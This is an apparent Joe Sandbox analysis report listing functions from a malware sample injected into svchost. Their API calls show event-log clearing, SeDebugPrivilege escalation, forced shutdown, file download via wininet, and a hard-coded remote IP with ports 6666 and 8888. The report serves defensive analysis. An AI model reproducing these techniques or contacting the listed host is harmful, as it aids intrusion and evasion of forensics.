                                                                                                              Function 04E0059B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 92memorylibraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 04E005C4
                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 04E005DC
                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 04E005EC
                                                                                                              • GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 04E005FC
                                                                                                              • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 04E0064E
                                                                                                              • VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 04E00663
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Virtual$AddressAllocHandleInfoModuleProcProtectQuerySystem
                                                                                                              • String ID: SetThreadStackGuarantee$kernel32.dll
                                                                                                              • API String ID: 3290314748-423161677
                                                                                                              • Opcode ID: a1abae6f72478db2147097523ef085db792a52bfb965216072bfa252a4c0f557
                                                                                                              • Instruction ID: f16a42a0da2bbefeea641ee254b77fdaedc4ac9b58cfc3109071cb956db33fb7
                                                                                                              • Opcode Fuzzy Hash: a1abae6f72478db2147097523ef085db792a52bfb965216072bfa252a4c0f557
                                                                                                              • Instruction Fuzzy Hash: 55310571A80219ABDB10DFA0EC44BEEB7B9FB44705B044915E926F3080DB74BA40CB90
                                                                                                              Function 04DFB410 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • OpenEventLogW.ADVAPI32(00000000,04E168EC), ref: 04DFB437
                                                                                                              • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 04DFB442
                                                                                                              • CloseEventLog.ADVAPI32(00000000), ref: 04DFB449
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Event$ClearCloseOpen
                                                                                                              • String ID: Application$Security$System
                                                                                                              • API String ID: 1391105993-2169399579
                                                                                                              • Opcode ID: 6777739a3077e55e5ff2720f09e262d2e050221907786736fa19225726730169
                                                                                                              • Instruction ID: 8f5d740c13a8086518652980e4469c39bbbb883faa36c0330e12bbfe8ddf615b
                                                                                                              • Opcode Fuzzy Hash: 6777739a3077e55e5ff2720f09e262d2e050221907786736fa19225726730169
                                                                                                              • Instruction Fuzzy Hash: FAE0E53264121047E221DF16EC4471FF7D4FBC871AF050209EA4856114C630E9019B96
                                                                                                              Function 04C7665F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3349974011.0000000004C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4c70000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: swprintf$_memset
                                                                                                              • String ID: :$@
                                                                                                              • API String ID: 1292703666-1367939426
                                                                                                              • Opcode ID: c41eee5bca564820e5e03cfe4b5e61b08d4c1815b016d4427b1dccbe98d26b42
                                                                                                              • Instruction ID: a3f4dc1fe36ec3a17d71050748eccff395bc151401e06da41a43f284dc7badcf
                                                                                                              • Opcode Fuzzy Hash: c41eee5bca564820e5e03cfe4b5e61b08d4c1815b016d4427b1dccbe98d26b42
                                                                                                              • Instruction Fuzzy Hash: E6315EB6D0021C9BDB14DFE5CC85FEEB7B9FB48700F50821DE906A7241EA746905CB90
                                                                                                              Function 04DF7790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,04DF794C), ref: 04DF77A6
                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,04DF794C,?,?,?,?,?,?,75920630), ref: 04DF77AD
                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 04DF77D5
                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 04DF7809
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                              • String ID: SeDebugPrivilege
                                                                                                              • API String ID: 2349140579-2896544425
                                                                                                              • Opcode ID: 3facf00bbf6e56b63c2538cb16a311d5a79c6aa5172c8a5b27992f15bfd5b40e
                                                                                                              • Instruction ID: d0a3d3eb100df07b212f2036fad2f2f7fe1cb5b41a293fbda83f7527efeab88c
                                                                                                              • Opcode Fuzzy Hash: 3facf00bbf6e56b63c2538cb16a311d5a79c6aa5172c8a5b27992f15bfd5b40e
                                                                                                              • Instruction Fuzzy Hash: 26116571B40208ABEF14DFE5DC45BFEB7B4FF08705F104159EA05A7290DA79A9058B60
                                                                                                              Function 025868F5 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 02587A1D
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02587A32
                                                                                                              • UnhandledExceptionFilter.KERNEL32(02595330), ref: 02587A3D
                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 02587A59
                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 02587A60
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 2579439406-0
                                                                                                              • Opcode ID: 3ac78018059ca4fa38e7b038d3074f43b95ada5ff0eda8a773cb443795434f63
                                                                                                              • Instruction ID: 75c35461681e58b57338d2e8c07beefa158301fd6b3c0eff6f6e81b018f71e4c
                                                                                                              • Opcode Fuzzy Hash: 3ac78018059ca4fa38e7b038d3074f43b95ada5ff0eda8a773cb443795434f63
                                                                                                              • Instruction Fuzzy Hash: 1A21EFB8C94200EFD702DF69F1496183BA5FB48345F92181AF5089B340EBB455A8FF2C
                                                                                                              Function 04DFB48F Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF7BC0: GetCurrentProcess.KERNEL32(00000028,?), ref: 04DF7BD9
                                                                                                                • Part of subcall function 04DF7BC0: OpenProcessToken.ADVAPI32(00000000), ref: 04DF7BE0
                                                                                                                • Part of subcall function 04DF7BC0: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04DF7C06
                                                                                                                • Part of subcall function 04DF7BC0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 04DF7C1C
                                                                                                                • Part of subcall function 04DF7BC0: GetLastError.KERNEL32 ref: 04DF7C22
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C30
                                                                                                              • ExitWindowsEx.USER32(00000006,00000000), ref: 04DFB49D
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 681424410-0
                                                                                                              • Opcode ID: e387395e7c1b1b0f35d4d93f4ca1c4db6a6ec2a72029c14fff6c6176e3fe0f38
                                                                                                              • Instruction ID: dd5be4a230dfa22489e31390e95d96a1e800244e0b9e1db1ed676a9eb2aa9043
                                                                                                              • Opcode Fuzzy Hash: e387395e7c1b1b0f35d4d93f4ca1c4db6a6ec2a72029c14fff6c6176e3fe0f38
                                                                                                              • Instruction Fuzzy Hash: 2FC08C3238010002F26436A57C22BAAB340DB85322F01802BAB0A880C18D57A42081B9
                                                                                                              Function 04DFB4B3 Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF7BC0: GetCurrentProcess.KERNEL32(00000028,?), ref: 04DF7BD9
                                                                                                                • Part of subcall function 04DF7BC0: OpenProcessToken.ADVAPI32(00000000), ref: 04DF7BE0
                                                                                                                • Part of subcall function 04DF7BC0: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04DF7C06
                                                                                                                • Part of subcall function 04DF7BC0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 04DF7C1C
                                                                                                                • Part of subcall function 04DF7BC0: GetLastError.KERNEL32 ref: 04DF7C22
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C30
                                                                                                              • ExitWindowsEx.USER32(00000005,00000000), ref: 04DFB4C1
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 681424410-0
                                                                                                              • Opcode ID: 867e95ab017bb3dd6419d828e85f1335a8c2ee9c739d641e2bbd771fd2112269
                                                                                                              • Instruction ID: 743a1e30bb6a9652611f1dbf20eae36b0d07fb6495af7248be78519ac8b0d364
                                                                                                              • Opcode Fuzzy Hash: 867e95ab017bb3dd6419d828e85f1335a8c2ee9c739d641e2bbd771fd2112269
                                                                                                              • Instruction Fuzzy Hash: DCC08C3238010002F26436A57C22BAAB340DB85323F02802BAB0A880C18D56A41081B9
                                                                                                              Function 04DFB46B Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DF7BC0: GetCurrentProcess.KERNEL32(00000028,?), ref: 04DF7BD9
                                                                                                                • Part of subcall function 04DF7BC0: OpenProcessToken.ADVAPI32(00000000), ref: 04DF7BE0
                                                                                                                • Part of subcall function 04DF7BC0: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 04DF7C06
                                                                                                                • Part of subcall function 04DF7BC0: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 04DF7C1C
                                                                                                                • Part of subcall function 04DF7BC0: GetLastError.KERNEL32 ref: 04DF7C22
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C30
                                                                                                              • ExitWindowsEx.USER32(00000004,00000000), ref: 04DFB479
                                                                                                                • Part of subcall function 04DF7BC0: CloseHandle.KERNEL32(?), ref: 04DF7C4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                              • String ID:
                                                                                                              • API String ID: 681424410-0
                                                                                                              • Opcode ID: 03b4760767a3c0c8bb4188f8b3b8de856581b98afc6a6d917a9e5ecd47aa0a51
                                                                                                              • Instruction ID: 36c1bf366572b104723cefe4bd7b9fb62427c9ae955971f9fd233b0d5ab017ff
                                                                                                              • Opcode Fuzzy Hash: 03b4760767a3c0c8bb4188f8b3b8de856581b98afc6a6d917a9e5ecd47aa0a51
                                                                                                              • Instruction Fuzzy Hash: 77C08C3238010006F26437A57C22BA9B340DB85322F01802BAB0A880C18D66A41081B9
                                                                                                              Function 04DFB5A6 Relevance: 42.2, APIs: 8, Strings: 16, Instructions: 161registrysleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 04DFF757: _malloc.LIBCMT ref: 04DFF771
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 04DFB5D6
                                                                                                              • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 04DFB5E6
                                                                                                              • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 04DFB603
                                                                                                              • _memset.LIBCMT ref: 04DFB624
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04DFB66B
                                                                                                              • _memset.LIBCMT ref: 04DFB68C
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 04DFB77C
                                                                                                              • Sleep.KERNEL32(000007D0), ref: 04DFB787
                                                                                                                • Part of subcall function 04DFF757: std::exception::exception.LIBCMT ref: 04DFF7A6
                                                                                                                • Part of subcall function 04DFF757: std::exception::exception.LIBCMT ref: 04DFF7C0
                                                                                                                • Part of subcall function 04DFF757: __CxxThrowException@8.LIBCMT ref: 04DFF7D1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                              • String ID: 127.0.0.1$47.239.116.158$47.239.116.158$6666$8888$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                              • API String ID: 1186799303-2669174398
                                                                                                              • Opcode ID: 45c9bf8bbfb20d8c9b1fc2850bc87572735d9d14bc779bb41ab3b5e76775f7fc
                                                                                                              • Instruction ID: 178b6628ac7393d5788171086a413c5adf2afc505689a662448c69d3ec9b4b4a
                                                                                                              • Opcode Fuzzy Hash: 45c9bf8bbfb20d8c9b1fc2850bc87572735d9d14bc779bb41ab3b5e76775f7fc
                                                                                                              • Instruction Fuzzy Hash: 1741E231BC03007BF624BB24AC47F1A7354DF44B05F055125FF08BA292D7A5B9458ABB
                                                                                                              Function 02589B32 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589B3A
                                                                                                              • __mtterm.LIBCMT ref: 02589B46
                                                                                                                • Part of subcall function 02589811: DecodePointer.KERNEL32(00000005,02587785,0258776B,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589822
                                                                                                                • Part of subcall function 02589811: TlsFree.KERNEL32(00000005,02587785,0258776B,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 0258983C
                                                                                                                • Part of subcall function 02589811: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02587785,0258776B,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 0258C125
                                                                                                                • Part of subcall function 02589811: _free.LIBCMT ref: 0258C128
                                                                                                                • Part of subcall function 02589811: DeleteCriticalSection.KERNEL32(00000005,?,?,02587785,0258776B,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 0258C14F
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02589B5C
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02589B69
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02589B76
                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02589B83
                                                                                                              • TlsAlloc.KERNEL32(?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589BD3
                                                                                                              • TlsSetValue.KERNEL32(00000000,?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589BEE
                                                                                                              • __init_pointers.LIBCMT ref: 02589BF8
                                                                                                              • EncodePointer.KERNEL32(?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C09
                                                                                                              • EncodePointer.KERNEL32(?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C16
                                                                                                              • EncodePointer.KERNEL32(?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C23
                                                                                                              • EncodePointer.KERNEL32(?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C30
                                                                                                              • DecodePointer.KERNEL32(Function_00009995,?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C51
                                                                                                              • __calloc_crt.LIBCMT ref: 02589C66
                                                                                                              • DecodePointer.KERNEL32(00000000,?,?,025876C2,02597AE0,00000008,02587856,?,?,?,02597B00,0000000C,02587911,?), ref: 02589C80
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02589C92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                              • API String ID: 3698121176-3819984048
                                                                                                              • Opcode ID: 8e129e1279e194cdaf1ac0bbcc247717d447758556963f371c6909b068625a9b
                                                                                                              • Instruction ID: 2c93c5cc2b0a0d5ea330efa5abf001d64e184c945be317e7c620546fd5798fb7
                                                                                                              • Opcode Fuzzy Hash: 8e129e1279e194cdaf1ac0bbcc247717d447758556963f371c6909b068625a9b
                                                                                                              • Instruction Fuzzy Hash: D0316070D802019FEB21EF75F8086293FE6BB44768756191AD400E2250FBB28829FF5E
                                                                                                              Function 04DF9EA0 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GdipGetImagePixelFormat.GDIPLUS(Function_00009A80,?,?,00000000), ref: 04DF9ECB
                                                                                                              • GdipGetImageHeight.GDIPLUS(Function_00009A80,?,?,00000000), ref: 04DF9F4C
                                                                                                              • GdipGetImageWidth.GDIPLUS(Function_00009A80,?,?,00000000), ref: 04DF9F74
                                                                                                              • GdipGetImagePaletteSize.GDIPLUS(Function_00009A80,?,?,00000000), ref: 04DF9FCF
                                                                                                              • _malloc.LIBCMT ref: 04DFA010
                                                                                                                • Part of subcall function 04DFF6C3: __FF_MSGBANNER.LIBCMT ref: 04DFF6DC
                                                                                                                • Part of subcall function 04DFF6C3: __NMSG_WRITE.LIBCMT ref: 04DFF6E3
                                                                                                                • Part of subcall function 04DFF6C3: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04E04550,00000000,00000001,00000000,?,04E08E36,00000018,04E17468,0000000C,04E08EC6), ref: 04DFF708
                                                                                                              • _free.LIBCMT ref: 04DFA050
                                                                                                              • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 04DFA078
                                                                                                              • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 04DFA107
                                                                                                              • GdipBitmapLockBits.GDIPLUS(Function_00009A80,?,00000001,?,?,?,00000000), ref: 04DFA162
                                                                                                              • _free.LIBCMT ref: 04DFA184
                                                                                                              • _memcpy_s.LIBCMT ref: 04DFA1D3
                                                                                                              • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 04DFA220
                                                                                                              • GdipCreateBitmapFromScan0.GDIPLUS(?,?,04E16AA0,00022009,?,00000000,?,00000000), ref: 04DFA27C
                                                                                                              • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 04DFA29C
                                                                                                              • GdipDrawImageI.GDIPLUS(00000000,Function_00009A80,00000000,00000000,?,00000000), ref: 04DFA2B7
                                                                                                              • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 04DFA2C4
                                                                                                              • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 04DFA2CB
                                                                                                              • _free.LIBCMT ref: 04DFA2E6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                                                              • String ID: &
                                                                                                              • API String ID: 640422297-3042966939
                                                                                                              • Opcode ID: 611f38931546fe50acea0e56c80bc47b84437d905a338a8a36c87eb214e9690c
                                                                                                              • Instruction ID: 59f2bcb85dc20a5d182021935b5d5df68f5b69632ae1e0dc8edf1453b28e472b
                                                                                                              • Opcode Fuzzy Hash: 611f38931546fe50acea0e56c80bc47b84437d905a338a8a36c87eb214e9690c
                                                                                                              • Instruction Fuzzy Hash: CED12BB1B002199BDB20CF55DC84BAAB7B4FF48304F0585A9EB1DA7201D774AE85CF69
                                                                                                              Function 04DF7CD0 Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 141libraryloaderfileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(wininet.dll), ref: 04DF7D13
                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 04DF7D27
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 04DF7D47
                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 04DF7D66
                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 04DF7DA3
                                                                                                              • _memset.LIBCMT ref: 04DF7DCE
                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 04DF7DDC
                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 04DF7E2B
                                                                                                              • CloseHandle.KERNEL32(?), ref: 04DF7E49
                                                                                                              • Sleep.KERNEL32(00000001), ref: 04DF7E51
                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 04DF7E5D
                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 04DF7E78
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3350782055.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3350782055.0000000004E24000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_4df0000_svchost.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                                              • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                              • API String ID: 1463273941-1099148085
                                                                                                              • Opcode ID: b9be9cf7b4df55002e538c74a494ac1068d58cdb3388d1421989b93f889cba8e
                                                                                                              • Instruction ID: c717cd44cd48b27f4727979d7eaf87d9df6e07b14dbe2472e2075be9d8736cbd
                                                                                                              • Opcode Fuzzy Hash: b9be9cf7b4df55002e538c74a494ac1068d58cdb3388d1421989b93f889cba8e
                                                                                                              • Instruction Fuzzy Hash: CE418475A80218ABD7309F649C41FEAB7F8FF44701F15C1E9E648A6180DE746E458FD4
                                                                                                              Function 02584520 Relevance: 27.2, APIs: 18, Instructions: 247threadnetworksleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00000064), ref: 0258454A
                                                                                                              • timeGetTime.WINMM ref: 0258456B
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0258458B
                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 025845AD
                                                                                                              • SwitchToThread.KERNEL32 ref: 025845C7
                                                                                                              • SetEvent.KERNEL32(?), ref: 02584610
                                                                                                              • CloseHandle.KERNEL32(?), ref: 02584634
                                                                                                              • send.WS2_32(?,02597420,00000010,00000000), ref: 02584658
                                                                                                              • SetEvent.KERNEL32(?), ref: 02584676
                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 02584681
                                                                                                              • WSACloseEvent.WS2_32(?), ref: 0258468F
                                                                                                              • shutdown.WS2_32(?,00000001), ref: 025846A3
                                                                                                              • closesocket.WS2_32(?), ref: 025846AD
                                                                                                              • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 025846E6
                                                                                                              • SetLastError.KERNEL32(000005B4), ref: 025846FA
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0258471B
                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02584733
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.3340758776.0000000002580000.00000040.00001000.00020000.00000000.sdmp, Offset: 02580000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.3340758776.000000000259F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2580000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                              • String ID:
                                                                                                              • API String ID: 1692523546-0
                                                                                                              • Opcode ID: 46d2cb18e2b03d6891052d1edfc5dcb7ed82f3e8e54e750f1467b2edbb076cfb
